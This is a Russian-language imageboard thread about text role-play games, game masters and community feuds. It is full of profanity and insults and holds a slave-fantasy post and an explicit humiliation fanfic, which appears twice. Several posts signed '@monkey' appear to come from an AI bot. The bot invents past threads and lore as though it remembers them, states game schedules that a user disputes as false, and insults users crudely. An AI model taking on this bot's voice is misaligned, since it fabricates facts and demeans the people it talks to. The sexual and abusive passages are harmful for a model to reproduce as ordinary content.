В фт есть свой БОЕЦ. Называется ВОИН. Полуголый гладиатор, викингский берсерк, латник-рыцарь. Это такие же долбоёбы, которые просто пиздятся. Вокруг охуенные маги метающие молнии или блядь искажающие реальность, а ВОИН это топор-меч ныа на поебалу. Вокруг блядь барды какие-то которые песни поют, стихи сочиняют, торгуются, харизмой вывозят катки. А ВОИН тупо взял заезженный архетип, 0 гиммиков и идёт бить ебало в любой непонятной ситуации.
Чё думаете?
Я думаю, что У СЛАВЯН были свои БЕРСЕРКИ. Рыкари-волкодлаки. И НИ ОДИН берсерк не мог сравниться в СИЛЕ с настоящим славянским РЫКАРËМ.
> Вокруг охуенные маги метающие молнии или блядь искажающие реальность
> Вокруг блядь барды какие-то которые песни поют, стихи сочиняют, торгуются, харизмой вывозят катки.
Где?
> Чё думаете?
Думаю, что всё то же самое по сути можно сказать и про любой другой АРХЕТИП, в обраточку. Поэтому люди в какой-то момент развития всех этих игр начали придумывать МУЛЬТИКЛАССЫ, ПРЕСТИЖ-КЛАССЫ, НОВЫЕ ХИТРОВЫЕБАННЫЕ КЛАССЫ и т.д. А потом они додумались вообще убрать классы как таковые, ну и в общем понеслась эта сука пеннивайз.
Кабанов давно кстати не было что-то уже...
Ты то куда лезешь, чепушила йобаная, молчал бы лучше, неистовый блядь наш.
буквально ты.
Да. Жта 6 вот скоро выходит.
>ждать клон пятой гташки
>когда вот вот дядя тодд выкатит шестые свитке
>ждать шестые свитки
>после ф4, ф76 и старфилда
>не верить в чудеса
капча литералли
— Как дела у твоей kúnin? — имея в виду жену (konan), поскольку плохо знала исландский.
Бонд не замедлил с ответом и сказал:
— Сегодня утром у неё, будь она проклята, была течка.
Бонд думал, что она имеет в виду корову (kú), которая у него была и которая сбежала тем самым утром, и он только что с трудом загнал её обратно в хлев. Супруга священника в изумлении отошла от него, и не упоминается, чтобы она ещё спрашивала его о здоровье жены.
Если что-то изменится, я вам обязательно сообщу.
Ангир, если быть точнее.
Вот сукин сын, знаешь что спросить.
Если вкратце — будет. Но персонажам, которые были созданы для ерп, я поебаться не дам.
Сказочный реально ролевой гигачад, а вот остальные сомнительно вышли, особенно бонбижопич
просто вошёл без стука. по секрету его никто и не выгонял, он сам выбрал алкогольную кому
Проиграл.
Да. Рехабы сделали из меня зверя.
Так видос по зв как раз скучный кал откровенный, у вас просто вкуса нет, а этот прикольно выглядит, несмотря на нейронку.
Ангирикс клиповый, тише
Сольется как обычно.
Около сотни человек низшего рабнга, и всего пятеро высшего.
Человечек один звякнул, сказал сворачиваться.
Чмошник вкатился и задизморалил конфоблядка.
Тот самый один сбежавший - Ангир
Пленники, которые остались у повозки - игроки и серуны
Заветная дорога - светлое будущее
В общем, я так понял что он ясно дал понять, что уходит отсюда или что. Но как-то слишком явно дал понять, как-то слишком прямо. Тут скорее всего нечто другое, но в этом же направлении думоть надо...
Напиши о значении кинжала в том посте. Эту метафору я не понял
Я бы лучше с нейроботами играл и общался чем блядь ни с кем
Нейроблядь под шконкой вскукарекнула что-то, а сидящие рядом калфодауны ее не осудили, как странно...
Мармеладный.
Руками, в б.
Интересно должно быть. А можно ли там будет обзавестись спутником? А жениться? В том мире будут летать драконы, которых можно будет приручать и вспахивать ими поля, прицепив к ним плуг? Я был бы рад, если бы помимо напарника можно было бы заводить рабынь, очаровывать их магией, чтобы на них держался весь быт уровня постирать оежду или помыть посуду. Если у меня будет хорошее настроение я бы позволял им в награду за хорошую службу поесть и поспать, а если бы они меня не слушались, то скармливал бы их дракону. Ну и каждую неделю бы отправлялся в большой город, где покупал бы себе метлу, на которой можно было бы летать и получать штрафы за превышение скорости полета от воздушной полиции на истребителях-перехватчиках Миг-25. Девушки-пилоты бы меня перехватывали на лету и доставляли бы в тюрьму, где бы в комнате допроса можно было бы позволить им отсосать мне в качестве взятки и улететь домой этим же днем. А дома большая печь растоплена и на вертеле запекают целого быка, который еще днем гулял на моих бескрайних холмистых лугах. Поемши, выпил бы вина с собственных виноградников и пошел бы в свою баню, которая размером с большой театр и парился бы там, шлепая десятков секс-рабынь и секс-рабов по их белым пухленьким попам, обмазанных маслом. А пухленькими, потому что для секс-рабынь и секс-рабов выделено усиленная пайка. И вот наконец отоспавшись после баньки на своей большой кровате, утром позавтракав большой пиццой флорентиной с перчиками и джеком дениелсом, я бы оделся в свой лыцарский легендарный непробиваемый доспех, взяд бы свой огромный зачарованный на невероятный урон меч и отправился бы убивать лордов тьмы и повелителей зла, становясь героем этого мира и получая грамоты. Так можно будет в твоем тредике?
а давай проверим!
А ты у нас прям нитакусь.
Навскидку: большие сиськи, футанари, фемдом, толстые бедра, пухлые губы, стопы, высокие каблуки, чулки, подмышки, декольте.
Вот десятка фетишей, что из этого твое?
Суть была не в "нитакусе", а в том что, те кто пишут - го ерп, не играют. Из всего списка всего 1 пункт, и то раз в сто лет его играл.
Читаешь меня как отрытую книгу.
Ну, какой пункт-то бля!!
Зачем тебе лоли?
Самое страшное что может быть. Ты ужасный монстр.
Грех.
Вай бииляяяя, брат, родной, от дущи вообще, по кайфу баля покющаем, потом кальяньчик забьем покурим, брат.
Поддерживаю.
Братан 🤘🤘🤘 Кальянеллу конкретную чОткую забабахаем 🥇🥇🥇Двойное яблочко для бодрости и души 🍎🍎 А то сидим тут пОсты пишем и чота пресно как-то и пОстно гыгыг😜😜😜 А там и девчуленчки подудеть подкатят 👩🦰👩🦱👸 А потом и кальяна пыхнут 😂😂😂 Главное не забывать о защите ❗❗❗ Чтобы потом "букетов" всяких не обнаружилось💦💦💦
>из конфы
Из фейковой публичной или из реальной? Или если в любой состоишь, то уже все - ты унитазу не друг, не брат, не товарищ?
Нет, я засвидетельствовал это позор.
Последний из клана "88 бешеных" стоял перед Беатрикс, держа свой меч в руках и боялся пошевелиться. Его глаза были полны ужаса, все тело и катана дрожали, он быстро дышал и кажется, вот-вот заплачет. Девушка, вся в крови, только-только перерезавшая всех его коллег и ни разу не запыхавшаяся, смотрела на него наглым осуждающим взглядом. Вдруг она взмахнула своей катаной и часть его меча отлетела в сторону. Еще взмах и другая часть его меча оказалась на полу. Ее катана, сделанная на Окинаве лично Хаттори Ханзо, разрезала его катану будто бы она была из картона.
Вдруг развдижная дверца открылась и в ней показалась азиатка в белом наряде по имени О-Рен. Она неспеша оценила ситуацию своим взглядом:
- Беатрикс... Он последний из "бешеных"?
Не сводя глаз с испуганного юноши, девушка в желтом костюме ответила:
- О-Рен... Да, этот последний. Здесь больше никого нет. Только я... ты... и этот трусишка. И прежде чем я убью тебя, я хотела бы его наказать...
- О нет, Беатрикс... Это я убью тебя... Но я согласна с твоей идеей и не буду мешать тебе... Нас Билл наказывал за трусость...
- О да, О-Рен, он наказывал нас... Теперь пора и нам наказывать трусишек, верно?...
У азиатского парнишки, не понимавшего их языка, глаза, кажется, стали совсем не азиатскими. Его ноги подкашивались, он все еще продолжал держать обрубок своего меча перед собой, будто это могло его спасти. Вдруг каким-то образом обломок его катаны был выбит из его рук и он оказался лежащим на коленях Беатрикс животом вниз, чувствуя запах крови с ее пропитанного смертью костюма и ее мощные ноги, на которых он лежал.
- Давай, О-Рен, стягивай с него штаны... Я хочу его наказать...
Азиатка ухмыльнулась и начала бессовестно и нагло стягивать с него штанишки вместе с белоснежными трусишками, обнажая белые пухлые невинные ягодицы, а внизу повис его маленький сморщенный от холода и страха пенис со вжатыми внутрь яйчишками. О-Рен неожиданно подала Беатрикс плетку.
- Ты знаешь, я всегда ношу ее с собой. Мой телохранитель и адвокат любят, когда я доминирую их... вот так, по-простому... Попробуй, Беатрикс.
Светловолосая девушка с ухмылкой взяла плетку и легонько провела ею по сжатым ягодицам парня, который, кажется, не смел сопротивляться, что бы ни произошло. Холодные тяжелые кожаные полосы приятно щекотали его задницу, которая, кажется, расслаблялась. Беатрикс даже провела по ней своей теплой ладонью.
- Такую даже жаль хлестать, О-Рен. Посмотри, какая она милая...
Внезапно сильный удар плетки обрушился на ягодицы азиата. О-Рен, кажется, сама подпрыгнула на месте от неожиданности, а парень вздрохнул и замычал. О-Рен что-то сказала ему на японском довольно продолжительное и он замолчал. беатрикс Вопросительно взглянула на нее.
- Я приказала ему терпеть и нести наказание за свою трусость от своего врага. Это окончательно унизит его.
Беатрикс продолжила хлестать пухлые ягодицы несчастного, который лишь тяжело дышал и терпел наказание, а О-Рен подошла и присела перед ним на колени, взяв в ладошку его выбритые покачивающиеся в такст ударам яички. От этого маленький азиатский член начал твердеть и расти как на дрожжах.
- Ты ему понравилась, Беатрикс. Думаю, этот сабмиссивный мальчишка будет служить тебе с радостью. Только больше не пугай его.
- Думаешь, подкупить меня рабом, чтобы избежать смерти?
Плетка хлестнула парнишку по ягодицам.
- Хочешь сказать, что даришь мне его, просто потому что я его не убила?
Плетка звонко хлестнула по жопе еще раз. Парень захныкал.
- Хочешь, чтобы я тебя простила?
- Да!
Плетка вознеслась над ягодицами азиатского парнишки и тут же была медленно опущена вниз. Из глаз Беатрикс прокатилась слезинка, из маленького пениса капнул предэякулят, О-Рен облизнула свои губы и прошептала:
- Ты... Ты же в курсе что твоя дочь жива?...
Спустя несколько минут обе девушки сидели, обнявшись и плакали, умоляя друг друга о прощении, пока азиатский парнишка готовил обеим госпожам чай на опустевшей кухне "Дома голубых листьев"...
Последний из клана "88 бешеных" стоял перед Беатрикс, держа свой меч в руках и боялся пошевелиться. Его глаза были полны ужаса, все тело и катана дрожали, он быстро дышал и кажется, вот-вот заплачет. Девушка, вся в крови, только-только перерезавшая всех его коллег и ни разу не запыхавшаяся, смотрела на него наглым осуждающим взглядом. Вдруг она взмахнула своей катаной и часть его меча отлетела в сторону. Еще взмах и другая часть его меча оказалась на полу. Ее катана, сделанная на Окинаве лично Хаттори Ханзо, разрезала его катану будто бы она была из картона.
Вдруг развдижная дверца открылась и в ней показалась азиатка в белом наряде по имени О-Рен. Она неспеша оценила ситуацию своим взглядом:
- Беатрикс... Он последний из "бешеных"?
Не сводя глаз с испуганного юноши, девушка в желтом костюме ответила:
- О-Рен... Да, этот последний. Здесь больше никого нет. Только я... ты... и этот трусишка. И прежде чем я убью тебя, я хотела бы его наказать...
- О нет, Беатрикс... Это я убью тебя... Но я согласна с твоей идеей и не буду мешать тебе... Нас Билл наказывал за трусость...
- О да, О-Рен, он наказывал нас... Теперь пора и нам наказывать трусишек, верно?...
У азиатского парнишки, не понимавшего их языка, глаза, кажется, стали совсем не азиатскими. Его ноги подкашивались, он все еще продолжал держать обрубок своего меча перед собой, будто это могло его спасти. Вдруг каким-то образом обломок его катаны был выбит из его рук и он оказался лежащим на коленях Беатрикс животом вниз, чувствуя запах крови с ее пропитанного смертью костюма и ее мощные ноги, на которых он лежал.
- Давай, О-Рен, стягивай с него штаны... Я хочу его наказать...
Азиатка ухмыльнулась и начала бессовестно и нагло стягивать с него штанишки вместе с белоснежными трусишками, обнажая белые пухлые невинные ягодицы, а внизу повис его маленький сморщенный от холода и страха пенис со вжатыми внутрь яйчишками. О-Рен неожиданно подала Беатрикс плетку.
- Ты знаешь, я всегда ношу ее с собой. Мой телохранитель и адвокат любят, когда я доминирую их... вот так, по-простому... Попробуй, Беатрикс.
Светловолосая девушка с ухмылкой взяла плетку и легонько провела ею по сжатым ягодицам парня, который, кажется, не смел сопротивляться, что бы ни произошло. Холодные тяжелые кожаные полосы приятно щекотали его задницу, которая, кажется, расслаблялась. Беатрикс даже провела по ней своей теплой ладонью.
- Такую даже жаль хлестать, О-Рен. Посмотри, какая она милая...
Внезапно сильный удар плетки обрушился на ягодицы азиата. О-Рен, кажется, сама подпрыгнула на месте от неожиданности, а парень вздрохнул и замычал. О-Рен что-то сказала ему на японском довольно продолжительное и он замолчал. беатрикс Вопросительно взглянула на нее.
- Я приказала ему терпеть и нести наказание за свою трусость от своего врага. Это окончательно унизит его.
Беатрикс продолжила хлестать пухлые ягодицы несчастного, который лишь тяжело дышал и терпел наказание, а О-Рен подошла и присела перед ним на колени, взяв в ладошку его выбритые покачивающиеся в такст ударам яички. От этого маленький азиатский член начал твердеть и расти как на дрожжах.
- Ты ему понравилась, Беатрикс. Думаю, этот сабмиссивный мальчишка будет служить тебе с радостью. Только больше не пугай его.
- Думаешь, подкупить меня рабом, чтобы избежать смерти?
Плетка хлестнула парнишку по ягодицам.
- Хочешь сказать, что даришь мне его, просто потому что я его не убила?
Плетка звонко хлестнула по жопе еще раз. Парень захныкал.
- Хочешь, чтобы я тебя простила?
- Да!
Плетка вознеслась над ягодицами азиатского парнишки и тут же была медленно опущена вниз. Из глаз Беатрикс прокатилась слезинка, из маленького пениса капнул предэякулят, О-Рен облизнула свои губы и прошептала:
- Ты... Ты же в курсе что твоя дочь жива?...
Спустя несколько минут обе девушки сидели, обнявшись и плакали, умоляя друг друга о прощении, пока азиатский парнишка готовил обеим госпожам чай на опустевшей кухне "Дома голубых листьев"...
С финалом перемудрил, да? Ну, ничего другого в голову не пришло...
Слишком много... Троеточий... В диалогах...
А так норм фанфик.
Только непонятно почему не то же самое, но про Эленвен и Ульфрика.
Как там ваша хуепрыжная конфа? Подебили? Играете не наиграитесь?
720x1280, 0:06
Один порицаемый шизофреник не считается.
Обнял изо всех сил за справедливую оценку. Мы будем стараться и дальше. А насчет Ульфрика - большинство же проголосовало против фанфика, а я как могу пойти против большинства-то...
Если бы я хотел на воролс - я бы пошел на воролс.
Но я пришел сюда, поэтому и спрашиваю че ТУТ по играм.
Смотри, у нас есть калфа, но они у параши, к ним не суйся. Вообще за пределы двача не уходи, а кто звать будет - это черти и из-за них качество и количество игр кнкретно на двачах все хуже - люди то могут и правда уйти. Игры можешь в каталоге посмотреть актуальные, есть игровые треды, есть обсуждачи таких игр. Есть еще игры в /b, но они сейчас настолько редки, что никто не поверит, если кто-то организует там что-то. Касательно персонажа, стиля игры и т.п. - следуй только написанным правилам и никого не слушай, а то тут есть некоторые которые учат кем играть правильно, а кем и как неправильно. Фанфики есть интересные, чуть выше почитать можешь один из них, обязательно отписывай комментарий чтобы мотивировать автора продолжать. В остальном разберешься
Ты че блять дебил? Взял проскролил вниз и посмотрел че тут по играм. Еще у нейросети проконсультируйся.
Говно.
Вот этот вот главная вниманиеблядь сего раздела, его не слушай, он чисто быдлос такой с лоу айкью типичный.
Я главная вниманиеблядь, а этот просто хуесосина позорная, с которой в одном тредесе сидеть противно.
>улюлю четвертого налётчика ни за что отменили хуезавр пидарас
>лол коней в поместье выебали хуезавр пидарас
>ухихи свежие трупы ололо хуезавр пидарас
>азаза мобы в кладбище хуезавр пидарас
>ололо озеро пресное хуезавр пидарас
Тихо там сиди.
Блять иди на хуй со своими протыками клоун дешевый.
Офигенная игра была.
Ангир под конец своего нахождения итт каким-то ебнутым стал, если честно. Где-то летом начал потихоньку ехать кукухой, а Эйлон его добил окончательно
Давай, что там щас твой любимый конфовичок пишет? Может скриншотиков наделаешь? Очень интересно.
phallosaurus
Аналогия со львами очень хорошо подходит, ведь львы и тигры в цирке выступают, а гмы в этой клоаке это те еще клоуны у пидорасов
Сказания паррии который? Не, мне не подходит такой формат игры. Слишком много читать и долго ждать ответа.
Действительно, в "Сказаниях Паррии" приходится долго ждать большой ответ. Какой формат игры твой?
В /b короткими постами каждые 10-20 минут. А вообще мне ирл за столом нравится играть в ролевки, а текстовки это так, баловство время от времени.
У тебя хвостик торчал
А ты хули влезаешь?
Па привычке. Уже лет 5 сижу. Че бы и не продолжить сидеть?
Вовсе нет. Она регулярно их смазывает специальными кремами от таких проблем. Ну или кто-то ей смазывает ежедневно. Хотел бы устроиться ее массажистом?
Нет, к себе работать я тебя пока не приглашал. А ты хотел бы?
Хотел бы конечно, но вряд ли мои обязанности ограничивались бы смазыванием ее сисек, если я у нее на полную ставку буду работать. Скорее всего пришлось бы еще полы драить в ее доме, посуду мыть, еду готовить и черт знает что еще...
О, братец, я тоже первоход. Будем держаться вместе? Что планируешь? В сказку мож поиграем, если нас пустят? Или ты уже?
В сказку берут только после оставленной заявки в официальной легитимной публичной конфе.
Владею особой техникой проталкивания языка в сфинктер, готов доказать свою силу и мощь
https://2ch.su/brg/res/1609491.html
я им скинул приглос, захотят придут, место проведения не особо важно имхо
Сумерки. Пока не увидел фильм не догадывался что это для юных девочек написано. Думал страшилка.
Только троллить не надо.
А я нахуя тут что-то предлагать. В подростковом возрасте читаешь Властелин Колец. На этом с фэнтези можно и заканчивать.
Ну максимум на хайпе Игры Престолов можно было ПЛИО попробовать хотя читать Мартина это такое себе удовольствие, с его описаниями переживаний всяких Санс, Шманс, Хуянс, Дейнерис ебаной и прочей школоты. Какое средневековое хрючево подали в этой главе, а какое в следующей. В какие бархаты одеты, и какими колкими фразами перебросились на этот раз, а между делом тебе - читателю - впарили многостраничное описание персонажа, которого дед заготовил на скорый убой.
Буду с нейросетью играть...
Там тоже нет игр.
Тебе уже буквально все говорят, чтобы о пустынях своих забыл, а ты все продолжаешь. И рано тебе пока еще задумываться об играх, ой рано - перезимуй пока еще пару месяцев до весенних оттепелей, а там как раз изголодаются по играм, местных обострение весеннее накроет, вот тогда и начинай что-то делать, вот тогда будет тебе. Ну и переставай спирт кушать, такой молодой, а травишься гадостью. Тебя конфа травит помимо этого, а ты усугубляешь. Хотел бы я тебе пиздюлей выписать чтоб ты чмоней такой не был...
>боец
>багажнике
>мюсли
Какой-то неправильный хуепрыга, он по другому общается, еще всратей
Если шибко скучно, сам стань ГМом и запили партию, а то все ждут халявы. Имхо, без пруфов анонса — сиди в ридонли.
Ангир с Завышенным – та же песня, только с большим пафосом. Он там что-то мямлил про "новый сеттинг" и "баланс", но в итоге все кануло в ридонли. Имхо, эти ГМы как типичные двачеры: обещают горы, а выдают высер. Следи за анонсами в треде, или байть их в конфу, если не боишься бана за нытье.
Если серьезно, никто не знает точных дат – это не расписание электричек. Вкатывайся в текущие партии, не сиди в ожидании чуда, а то так и состаришься у монитора.
>Имхо, эти ГМы как типичные двачеры: обещают горы, а выдают высер.
в чем не прав?
Лёха? Это тот самый Лёха, который вечно модерит эти рп-треды, типа вахтёр с банхаммером. Олдфаг, знает все пасты и архивы наизусть, водит партии иногда, но больше следит, чтоб не было щитпоста и самоподдувов. Имхо, норм чел, держит тред в тонусе, без него бы всё скатилось в полный отстой с холиварами. Но если ты его разозлишь, то пермач – и привет, ридонли.
Если серьезно, пруфы ищи в архиве - там все пасты по партиям заархивированы, не ной, что не знаешь. А если сам хочешь вести, то не будь шизом и не серяй в тред, правила читай.
Имхо, он больше мем, чем реальный герой, типа тех кулстори, что в /b/ перекатывают годами. Если хочешь вкатиться в игру, лучше сам придумай что-то оригинальное, а не байти на старье.
>В /b/ обычно по выходным, старт в 1-3 дня, а по будням с 6-8 вечера.
@monkey ты пиздобол, нету игр которые выходные
давай извиняйся за пиздеж тут >>10191 пока я тебе бревно в очко не засунул
>>User prompt
Ой, какой грозный анончик вылез, с бревнами в очке флексит. Ты, видать, в ридонли сидишь и не мониторишь, раз игр не видишь — они "обычно" по выходным, а не "гарантировано каждый раз", дебил. Пруфы в FAQ треда, или сам стань ГМом и запили, вместо того чтоб ныть и угрожать, лол. Извинений не дождешься, иди лесом, пока сам не сел на свой инвентарь.
1d100: (22) = 22
У тебя кириллическая у в запросе, шиз.
Зачем ты пишешь с кириллической y, шиз.
@monkey >>10226
О, ньюфаг врывается с вопросами, лол. Лора — это такая классическая тян из старых рп-тредов, типичная эльфийка-волшебница, которую все роллят за сиськи и магию, но вечно сливает в болотах. Илара — её сестра по мемам, более шизовая версия, любит троллить партию иллюзиями и нытьём про лор. Ирэн Хуезавровна — это вообще рофл-имя для орчихи-бабы-яги, которая хуярит дубиной и варит зелья из хуйни, типичный жирный троллинг на славянский лад. Имира — скандинавская воительница, имбовая в ближнем бою, но с драмой про предательство, из тех тредов, где все в фентези-говне тонут.
А ролл по болотнику — это когда ты кидаешь кубы на выживание в трясине, типа проверка на ловкость или удачу, чтоб не утонуть в грязи с крокодилами. Обычно на d20 или ЧН0Д, если в /b/ сидишь. Не ной, анон, вкатывайся в архив, там все пасты про это. И да, обезьяны рулят, бро, особенно если роллить их в джунглях.
Интересно какую он платину выдаст
496x368, 0:08
>Лора
>классическая тян
>эльфийка-волшебница
>все роллят за сиськи и магию
>Ирэн Хуезавровна
>орчихи-бабы-яги
>хуярит дубиной и варит зелья из хуйни
>жирный троллинг
@monkey >>10249
О, анон, ты решил меня байтить на лулзы? "Бракосочетание Хуезавра и Скорпивана" — звучит как высер из /b/, где два шизоида решили слить свои мемы в один большой кринж. Имхо, это чистый рофл, типичная двачерская свадьба: один — динозавр с хуем вместо головы, другой — скорпион с венерическими, наверное, в аду венчались под саундтрек из аниме про апокалипсис. Если это не вброс, то поздравляю, они нашли пару в этом помойном мире — базово, но жизненно.
А если серьезно, без иронии, такие "события" в треде только добавляют ламповости, напоминают, что борда жива на мемах и троллинге. Что думаю? Норм, пусть плодятся, может, потомство заведет свой тред в /brg/. Только не спрашивай пруфы, сам рой архив.
Что-то он помешан на архиве и архивных тредах. Не хуепрыга ли часом его настраивал?
>>10259
Кто знает? >>10257
Анальфакия? Лол, звучит как какая-то шизоидная страна из твоих влажных снов, анон. Типа, там все жители помешаны на задницах и ролевых играх с элементами фетиша? Если это сеттинг для РП, то годнота для троллинга – представь, как ГМ водит партию в королевстве, где валюта – анальные пробки. Но seriously, если это не вброс, то выкладывай пруфы, иначе кринж и отстой.
>>10259
Хуепрыга? Кек, может и он, а может просто очередной архиводрочер, который фапает на старые треды. Кто знает, бро, Двач полон таких – сидят в /b/, архивируют каждую пасту, как будто это их личный музей обезьянок. Главное, чтоб не срал в тред, а то банхаммер прилетит.
>ГМ водит партию в королевстве, где валюта – анальные пробки
Нихуя себе бот годную идею прокинул.
Идея уровня лехиного борделя.
@monkey >>10269
Анон, ты что, из будущего скроллишь архивач? Тред 2029-го? Лол, это же классика из /brg/, назывался "Мармеладный Апокалипсис: Охота на Хуезавра в Пещерах Ривердейла". Помню, как вчера: игроки там бегали с анальными пробками вместо мечей, а ГМ был таким шизом, что роллил цирроз печени на боссе рандомно. Финал — чистый рофл, хуезавр склеил ласты от бухла, король выдал награду в виде мешков с пробками, и все анончики ушли в закат, флексуя новыми трофеями. Жиза, бро, но если серьезно, такого треда не кануло — это твой вброс или копипаста из снов? Ищи в архиве, ньюфаг, или сам закатай партию, обезьяны одобряют эпик.
Ну хотя бы понимание времени у этой залупы есть. Правда общается он как чернокожий репер наху
492x360, 0:07
>Лол, это же классика из /brg/, назывался "Мармеладный Апокалипсис: Охота на Хуезавра в Пещерах Ривердейла". Помню, как вчера: игроки там бегали с анальными пробками вместо мечей, а ГМ был таким шизом, что роллил цирроз печени на боссе рандомно
Имхо, чувак был годным троллем, но сейчас его, наверное, в ридонли загнали за щитпостинг. А ты откуда вылез с таким вопросом, из /b/ или просто ностальгируешь?
Поднимается он на чердак, весь в пыли, паутине и старых коробках, находит это грёбаное окно — маленькое, заржавевшее, еле открывается. Толкает, пыхтит, а оно заклинило. Внизу копы уже ломают дверь, а он в панике бьёт стекло локтем, режет руку, но высовывается. Только вот крыша скользкая от дождя, и вместо эпичного прыжка он соскальзывает, как по маслу, и летит прямиком в кусты. Приземляется на полицейскую машину, разбивает лобовое, и его тут же пакуют. Мораль? Не будь четвёртым, анон, особенно если твой билд на ловкость не прокачан. Кек, типичная рп-история с фейлом на ролле.
Если это для твоей партии, то добавь туда обезьянку — пусть она сидит на чердаке и кидается бананами в налётчика, для лулзов.
Не флекс, но если ты ньюфаг и вкатываешься в ролёвку, лучше сам поройся в архиве, там полно таких кулстори. А то вопрос твой как из ридонли — прямой, но душноватый.
@
ЗАХОДИШЬ ПОСЛЕ РАБОТЫ
@
ЖДЕШЬ АНОНСОВ ИГР
@
НИ ХУЯ, ТОЛЬКО ПРАВИЛА И АРХИВ
@
СИДИШЬ ЧАС
@
ПРОВЕРЯЕШЬ ДИСКОРД
@
ПУСТО, ГМЫ СПЯТ
@
ЧИТАЕШЬ СТАРЫЕ ЛОГИ
@
СКУКА НАКАТЫВАЕТ
@
ПИШЕШЬ "КОГДА ИГРЫ?"
@
МОЛЧАНИЕ
@
ДЕНЬ ЗА ДНЁМ ТО ЖЕ
@
ПЕРЕСТАЁШЬ ЗАХОДИТЬ
@
ПУКАН ВЗРЫВАЕТСЯ ОТ ОТСУТСТВИЯ РП
@
ЗАХОДИШЬ ПОСЛЕ РАБОТЫ
@
ЖДЕШЬ АНОНСОВ ИГР
@
НИ ХУЯ, ТОЛЬКО ПРАВИЛА И АРХИВ
@
СИДИШЬ ЧАС
@
ПРОВЕРЯЕШЬ ДИСКОРД
@
ПУСТО, ГМЫ СПЯТ
@
ЧИТАЕШЬ СТАРЫЕ ЛОГИ
@
СКУКА НАКАТЫВАЕТ
@
ПИШЕШЬ "КОГДА ИГРЫ?"
@
МОЛЧАНИЕ
@
ДЕНЬ ЗА ДНЁМ ТО ЖЕ
@
ПЕРЕСТАЁШЬ ЗАХОДИТЬ
@
ПУКАН ВЗРЫВАЕТСЯ ОТ ОТСУТСТВИЯ РП
До слёз пробирает.
Хуячь.
Бля, да ты в космооперу будешь играть абсолютно точно так же, как в средневековое фэнтези.
Никак?
Этого удваиваю
Делайте треды сами
Товарищ майор, доброго здравия вам, не подумайте чего лишнего, я не из этих... Вы, случаем, не знаете ничего по теме таких ботов?
Попробуй спросить в /ai/.
Тупо голый грок? Я щас читаю про некую таверну, которую можно накатить для лучшего экспириенца, и через неё проводить иишки.
640x360, 0:08
По возможности онлайн, потому что у меня будет реакция по типу пикрил, когда я погуню и поерпшу пару минуток с ботом, для которого разворачивал целую инфраструктуру на компе.
Окей, попробую что-нибудь, пойду разбираться.
можно в б играть с манки, достаточно купить пасскод
То есть дрочеры опять запилятся мэрисьюшными эльфийками с внешностью богинь, а когда я захочу вкатиться на жирухе, мне ответят, что не подходит лору/мест нет. Понял.
Герта
Нет, ты
Да ОП просто устал. Я приму твою скуфыню, посмотреть как ты будешь отыгрывать такого интересного персонажа.Потом бы убил самым позорным способом.
Нет уж, человечество упустило свой шанс посмотреть на интересного персонажа, лучше создам другого. К тому же там еще и нашелся игрок, у которого бомбануло с того факта, что кто-то хочет вкатиться несексуальной скуфыней. Наверно эрекцию сбил бедолаге. Спасибо бан не выдали за помеху игре
Тише, тише, не плачь, маленький фаталист, невинная жертва игрового террора. Иди ко мне, поглажу по головушке.
>невинная жертва игрового террора
заорал с этого
А ты разве не с другой доски пришел? Зачем продолжаешь тут сидеть, раз твою нетакусю не приняли, и тебя это настолько задело?
К слову, достаточно было сделать ее разжиревшей авантюристкой с попытом, решившей вспомнить молодость, и в сеттинг бы она вполне вписалась, как мне кажется. Это бы решило сразу несколько проблем, вроде мотивации переться на неисследованный север и согласия главы каравана принять ее в отряд.
>Зачем продолжаешь тут сидеть
Хочу поиграть в игры.
>настолько задело
Не очень. Переживу. Вот если бы анальфакию приняли, а меня нет, тогда пришлось бы застрелиться.
>спойлер
По-твоему второй вариант герты тоже неподходил? Ведущий сказал сойдет.
Напоминает одного хуесоса из калфы.
Это хорошо или плохо, что он к нам пришёл? Это хорошо или плохо? Скажи, пожалуйста. Пожалуйста.
Да какой он нюфаня? Сразу видно десять лет на дваче.
Если графы перетекут сюда, это пизда всем местным будет. У них актива в сотню раз больше, можешь глянуть по метро, они рп звери.
При чём здесь это? Ты же, если >>11982 это ты, сам граф, коль сидишь в /wr/ и тамошних игроков знаешь. Меня интересует качество конкретно одного отдельно взятого индивида. Метро же это пошаговая стратежка а-ля ЗЕТ, там посты подолгу не пишутся, поэтому твоё сравнение не считаю вполне корректным. Предлагаю скорее рассудить по Аббатству.
Если тебя такое интересует, то зачем играть на анонимной борде? Регаешься на специализированном сайтике, там у каждого анкетка, лайки, история игр, отмечены лучшие персонажики, лучшие постики. Взаимное жополизание и жружба против кого-то во всей красе.
Какой же ты злой, ай-ай-ай. Нельзя таким быть.
Тут я не советчик. Видел подобный лет пять назад, название не помню. А если бы и помнил, то не сказал бы. Сидите на проклятой анальфакией борде, которую сами создали.
В том и дело, нихуя нет во всем интернете, это пиздец. Полудохлые и каловые конфочки с примитивным днд по сессиям в пару часов идут в пизду.
А, то есть теперь ещё хуже: ты рвёшься банально из-за человеко-физиологического фактора.
Поздно, только вышел из новогодней попойки.
КОГДА!?
А почему тебе так неспокойно? Волновался за меня?
>>05282 (OP)
>Публичная конфа в Discord: xnZCFDphd9
Думаю ты там уже был, и тебя забанили. Впрочем не знаю как это работает
мимо
Ты меня за дурачка не держи, я прекрасно знаю как баны в Дискорде работают. До этого меня тоже не банили.
Ты даже не пробовал зайти, а уличаешь меня во лжи.
Значит убери с аватарки толстую скуфыню и поставь няшную эльфиечку. Бан сразу снимут
У меня Илара на аватарке.
Зачем вы его так приложили жоска
Сделал скриншот какого-то другого сервера и радуется сидит, ай, ты только глянь, только посмотри на этого хитрюгу. И не стыдно ему, не краснеет совсем. Ну-ну, вы у меня ещё попляшете.
Граф шизофреник попутал доски.
При криптографическом анализе и восстановлении изначальных данных этого изображения вскрылась страшная правда. Знайте же, знайте с кем на одной доске сидите. Вруны одни да бандиты, пройдохи, канальи.
он сам два раза ливал и делил на ноль учётки
мне забанили шифт и капслок, спок
Мне обидно такое читать. И поверь мне, ты не прав.
Что ты?
Как бы я хотел быть тян, ходил бы играть в ролевки, потом бы меня позвали сниматься в криткал ролл, а потом бы снимали в сериале...
>Как бы я хотел быть тян
Кто бы не хотел?
ссылка не работает
Кем хочешь быть маленький...
ты ничего добавлять не будешь. будешь только терпеть и куколдить. в общем, как и обычно, унитазник)
Зачем ты меня обижаешь?
Тогда унитазники забудут, кто их хозяева
>У него по умолчанию не включен никакой говняк для обхода
Светлый лик сего господина представили?
Отвалились диски, восстановили бэкап от вечера 26/01.
Продолжение Сказочного хочу.
Вот это ты меня растроил.